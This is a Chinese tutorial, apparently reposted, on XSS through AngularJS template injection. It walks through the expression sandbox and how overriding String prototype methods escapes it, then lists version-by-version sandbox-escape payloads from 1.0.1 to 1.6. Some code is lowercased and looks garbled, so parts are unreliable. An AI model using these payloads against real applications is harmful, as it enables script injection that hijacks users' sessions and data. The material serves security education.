AngularJs用户输入动态模板XSS攻击示例详解
概述
xss攻击是web攻击中最常见的攻击方法之一,它是通过对网页注入可执行代码且成功地被浏览器执行,达到攻击的目的,形成了一次有效xss攻击,一旦攻击成功,它可以获取用户的联系人列表,然后向联系人发送虚假诈骗信息,可以删除用户的日志等等,有时候还和其他攻击方式同时实施比如sql注入攻击服务器和数据库、click劫持、相对链接劫持等实施钓鱼,它带来的危害是巨大的,是web安全的头号大敌。
前情提要
angularjs通过“{{}}”来作为输出的标志,而对于双括号里面的内容angularjs会计计算并输出结果,我们可以在里面输入js代码,并且一些语句还能得到执行,这使得我们的xss有了可能,虽然不能直接写函数表达式,但这并难不住我们的白帽。
沙箱检验
angularjs会对表达式进行重写,并过滤计算输出,比如我们输入
{{1 + 1}}
在js中会被转换成
"use strict";
var fn = function(s, l, a, i) {
return plus(1, 1);
};
return fn;
return fn;这里的返回会被angualrjs执行,angularjs改写这个方法后转换是这样的
"use strict";
var fn = function(s, l, a, i) {
var v0, v1, v2, v3, v4 = l && ('constructor' in l),
v5;
if (!(v4)) {
if (s) {
v3 = s.constructor;
}
} else {
v3 = l.constructor;
}
ensuresafeobject(v3, text);
if (v3 != null) {
v2 = ensuresafeobject(v3.constructor, text);
} else {
v2 = undefined;
}
if (v2 != null) {
ensuresafefunction(v2, text);
v5 = 'alert\u00281\u0029';
ensuresafeobject(v3, text);
v1 = ensuresafeobject(v3.constructor(ensuresafeobject('alert\u00281\u0029', text)), text);
} else {
v1 = undefined;
}
if (v1 != null) {
ensuresafefunction(v1, text);
v0 = ensuresafeobject(v1(), text);
} else {
v0 = undefined;
}
return v0;
};
return fn;
angularjs会检查每一个输入的参数,ensuresafeobject方法会检验出函数的构造方法,窗口对象,对象,或者对象的构造方法,任意的其中一项被检查出来,表达式都不会执行.angularjs还有ensuresafememebername和ensuresafefunction来过滤掉方法原型链方法和检查这个指向。
如何逃逸
怎么样能逃过模板的过滤呢,可以让我们输入的模板被角执行,因为angularjs不支持函数输入,我们不可以直接覆盖本地的js函数。但在字符串对象中找到了漏洞,fromcharcode,则charcode, charat,由于没有重写这些方法,通过改变本地的js函数,我可以在angularjs调用这些方法的时候为自己开一个后门,将我改写的来覆盖原来的函数。
'a'.constructor.fromcharcode=[].join; 'a'.constructor[0]='\u003ciframe onload=alert(/backdoored/)\u003e';
formcharcode方法执行的时候内部的this指向的是string对象,通过上面的可指执行语句,我们可以对fromcharcode 函数进行覆盖,当在本页面内执行时,比如:
onload=function(){
document.write(string.fromcharcode(97));//会弹出 /backdoored/
}
还可以这样
'a'.constructor.prototype.charcodeat=[].concat
当angularjs调用charcodeat函数时,我的代码就被执行到angular源码去了,比如说在这段里面有encodeentities 方法用来对属性和名称做一个过滤然后输出,
if (validattrs[lkey] === true && (uriattrs[lkey] !== true || urivalidator(value, isimage))) {
out(' ');
out(key);
out('="');
out(encodeentities(value));//找的就是encodeentities
out('"');
}
具体的encodeentities代码如下:
function encodeentities(value) {
return value.
replace(/&/g, '&').
replace(surrogate_pair_regexp, function(value) {
var hi = value.charcodeat(0);
var low = value.charcodeat(1);
return '' + (((hi - 0xd800) * 0x400) + (low - 0xdc00) + 0x10000) + ';';
}).
replace(non_alphanumeric_regexp, function(value) {
return '' + value.charcodeat(0) + ';';//这里发生了不好事情,我改写了这个方法,可以植入一些恶意代码,并且得到返回输出 }).
replace(/</g, '<').
replace(/>/g, '>');
}
具体执行
//这是输入代码
{{
'a'.constructor.prototype.charat=[].join;
$eval('x=""')+''
}}
//这是被覆盖影响的代码
"use strict";
var fn = function(s, l, a, i) {
var v5, v6 = l && ('x\u003d\u0022\u0022' in l);//被影响的
if (!(v6)) {
if (s) {
v5 = s.x = "";//被影响的
}
} else {
v5 = l.x = "";//被影响的
}
return v5;
};
fn.assign = function(s, v, l) {
var v0, v1, v2, v3, v4 = l && ('x\u003d\u0022\u0022' in l);//被影响的
v3 = v4 ? l : s;
if (!(v4)) {
if (s) {
v2 = s.x = "";//被影响的
}
} else {
v2 = l.x = "";//被影响的
}
if (v3 != null) {
v1 = v;
ensuresafeobject(v3.x = "", text);//被影响的
v0 = v3.x = "" = v1;//被影响的
}
return v0;
};
return fn;
{{
'a'.constructor.prototype.charat=[].join;
$eval('x=alert(1)')+'' //注入了alert(1)
}}
"use strict";
var fn = function(s, l, a, i) {
var v5, v6 = l && ('x\u003dalert\u00281\u0029' in l);
if (!(v6)) {
if (s) {
v5 = s.x = alert(1);
}
} else {
v5 = l.x = alert(1);
}
return v5;
};
fn.assign = function(s, v, l) {
var v0, v1, v2, v3, v4 = l && ('x\u003dalert\u00281\u0029' in l);
v3 = v4 ? l : s;
if (!(v4)) {
if (s) {
v2 = s.x = alert(1);
}
} else {
v2 = l.x = alert(1);
}
if (v3 != null) {
v1 = v;
ensuresafeobject(v3.x = alert(1), text);
v0 = v3.x = alert(1) = v1;
}
return v0;
};
return fn;
下面附上一些代码,可以直接结合angularjs验证
不同版本的实现代码以及发现者:
1.0.1 - 1.1.5 mario heiderich (cure53)
{{constructor.constructor('alert(1)')()}}
1.2.0 - 1.2.1 jan horn (google)
{{a='constructor';b={};a.sub.call.call(b[a].getownpropertydescriptor(b[a].getprototypeof(a.sub),a).value,0,'alert(1)')()}}
1.2.2 - 1.2.5 gareth heyes (portswigger)
{{'a'[{tostring:[].join,length:1,0:'__proto__'}].charat=''.valueof;$eval("x='"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+"'");}}
1.2.6 - 1.2.18 jan horn (google)
{{(_=''.sub).call.call({}[$='constructor'].getownpropertydescriptor(_.__proto__,$).value,0,'alert(1)')()}}
1.2.19 - 1.2.23 mathias karlsson
{{tostring.constructor.prototype.tostring=tostring.constructor.prototype.call;["a","alert(1)"].sort(tostring.constructor);}}
1.2.24 - 1.2.29 gareth heyes (portswigger)
{{'a'.constructor.prototype.charat=''.valueof;$eval("x='\"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+\"'");}}
1.3.0 gábor molnár (google)
{{!ready && (ready = true) && (
!call
? $$watchers[0].get(tostring.constructor.prototype)
: (a = apply) &&
(apply = constructor) &&
(valueof = call) &&
(''+''.tostring(
'f = function.prototype;' +
'f.apply = f.a;' +
'delete f.a;' +
'delete f.valueof;' +
'alert(1);'
))
);}}
1.3.1 - 1.3.2 gareth heyes (portswigger)
{{
{}[{tostring:[].join,length:1,0:'__proto__'}].assign=[].join;
'a'.constructor.prototype.charat=''.valueof;
$eval('x=alert(1)//');
}}
1.3.3 - 1.3.18 gareth heyes (portswigger)
{{{}[{tostring:[].join,length:1,0:'__proto__'}].assign=[].join;
'a'.constructor.prototype.charat=[].join;
$eval('x=alert(1)//'); }}
1.3.19 gareth heyes (portswigger)
{{
'a'[{tostring:false,valueof:[].join,length:1,0:'__proto__'}].charat=[].join;
$eval('x=alert(1)//');
}}
1.3.20 gareth heyes (portswigger)
{{'a'.constructor.prototype.charat=[].join;$eval('x=alert(1)');}}
1.4.0 - 1.4.9 gareth heyes (portswigger)
{{'a'.constructor.prototype.charat=[].join;$eval('x=1} } };alert(1)//');}}
1.5.0 - 1.5.8 ian hickey
{{x = {'y':''.constructor.prototype}; x['y'].charat=[].join;$eval('x=alert(1)');}}
1.5.9 - 1.5.11 jan horn (google)
{{
c=''.sub.call;b=''.sub.bind;a=''.sub.apply;
c.$apply=$apply;c.$eval=b;op=$root.$$phase;
$root.$$phase=null;od=$root.$digest;$root.$digest=({}).tostring;
c=c.$apply(c);$root.$$phase=op;$root.$digest=od;
b=c(b,c,b);$evalasync("
astnode=pop();astnode.type='unaryexpression';
astnode.operator='(window.x?void0:(window.x=true,alert(1)))+';
astnode.argument={type:'identifier',name:'foo'};
");
m1=b($$asyncqueue.pop().expression,null,$root);
m2=b(c,null,m1);[].push.apply=m2;a=''.sub;
$eval('a(b.c)');[].push.apply=a;
}}
= 1.6.0 mario heiderich(cure53)
{{constructor.constructor('alert(1)')()}}
转自:https://pockr.org/activity/detail?activity_no=act_017d460d4e5988dad2
总结
以上就是这篇文章的全部内容了,希望本文的内容对大家的学习或者工作具有一定的参考学习价值,如果有疑问大家可以留言交流,谢谢大家对的支持。
上一篇: javaScript产生随机数的用法小结
下一篇: 孩子说话结巴怎么办?快来试试这些方法